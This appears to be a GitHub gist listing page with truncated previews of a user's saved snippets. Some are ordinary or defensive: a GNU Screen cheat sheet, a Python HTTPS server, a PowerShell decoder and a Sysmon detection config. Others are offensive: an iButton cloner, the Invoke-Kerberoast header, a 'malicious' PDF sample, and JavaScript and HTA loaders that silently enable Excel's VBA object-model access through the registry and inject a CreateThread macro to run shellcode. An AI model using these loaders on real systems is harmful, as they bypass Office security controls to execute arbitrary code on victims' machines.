Skip to content

Instantly share code, notes, and snippets.

@minkione
minkione / iButtonRW.ino
Created January 29, 2017 20:46 — forked from swiftgeek/iButtonRW.ino
RW1990 programmer, with arduino
// Based on https://danman.eu/blog/cloning-ibutton-using-rw1990-and-avr/
// and: http://elimelecsarduinoprojects.blogspot.com/2013/06/read-dallas-ibutton-arduino.html
// By Swift Geek 28-08-2015
// TODO: danger to atmega328! Use OpenCollector logic!
// Used 4.8kΩ Pull-up and 3.1 Vcc for arduino/pull-up
#include <OneWire.h>
OneWire ibutton (8); // I button connected on PIN 2.
@minkione
minkione / screen.md
Created February 1, 2017 18:43 — forked from fredrick/screen.md
GNU Screen Cheat Sheet

#GNU Screen Cheat Sheet

##Basics

  • ctrl a c -> cre­ate new win­dow
  • ctrl a A -> set win­dow name
  • ctrl a w -> show all win­dow
  • ctrl a 1|2|3|… -> switch to win­dow n
  • ctrl a " -> choose win­dow
  • ctrl a ctrl a -> switch between win­dow
  • ctrl a d -> detach win­dow
@minkione
minkione / Invoke-Kerberoast.ps1
Created February 6, 2017 10:56
Invoke-Kerberoast.ps1
<#
Invoke-Kerberoast.ps1
Author: Will Schroeder (@harmj0y), @machosec
License: BSD 3-Clause
Required Dependencies: None
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast).
Note: the primary method of use will be Invoke-Kerberoast with various targeting options.
@minkione
minkione / example.js
Created February 6, 2017 19:52
Shellcode via Office via . JS
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';
@minkione
minkione / CalcExcel.hta
Created February 6, 2017 19:54
Shellcode Execution Via HTA
<html>
<head>
<script>
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
@minkione
minkione / launch_url.txt
Created February 11, 2017 06:34 — forked from averagesecurityguy/launch_url.txt
"Malicious" PDF
%PDF-1.0
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/Names 6 0 R
>>
endobj
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@minkione
minkione / Python SimpleHTTPServer with SSL
Created February 14, 2017 12:32 — forked from rozifus/Python SimpleHTTPServer with SSL
Python SimpleHTTPServer with SSL
# useful for running ssl server on localhost
# which in turn is useful for working with WebSocket Secure (wss)
# copied from http://www.piware.de/2011/01/creating-an-https-server-in-python/
@minkione
minkione / psx.py
Created February 15, 2017 09:16 — forked from anonymous/psx.py
PowerShell decoder by @JohnLaTwC
## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
## * base64 data which encode unicode, gzip, or deflate encoded strings
## * it can operate on a file or stdin
## * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
##
import sys
import zlib
import re
@minkione
minkione / config-client.xml
Created February 15, 2017 09:35 — forked from Neo23x0/config-client.xml
Sysmon Base Configuration - Workstations
<!--
This is a Microsoft Sysmon configuration to be used on Windows workstations
v0.2.1 December 2016
Florian Roth (with the help and ideas of others)
The focus of this configuration is
- malware detection (execution)
- malware detection (network connections)
- exploit detection
It is not focussed on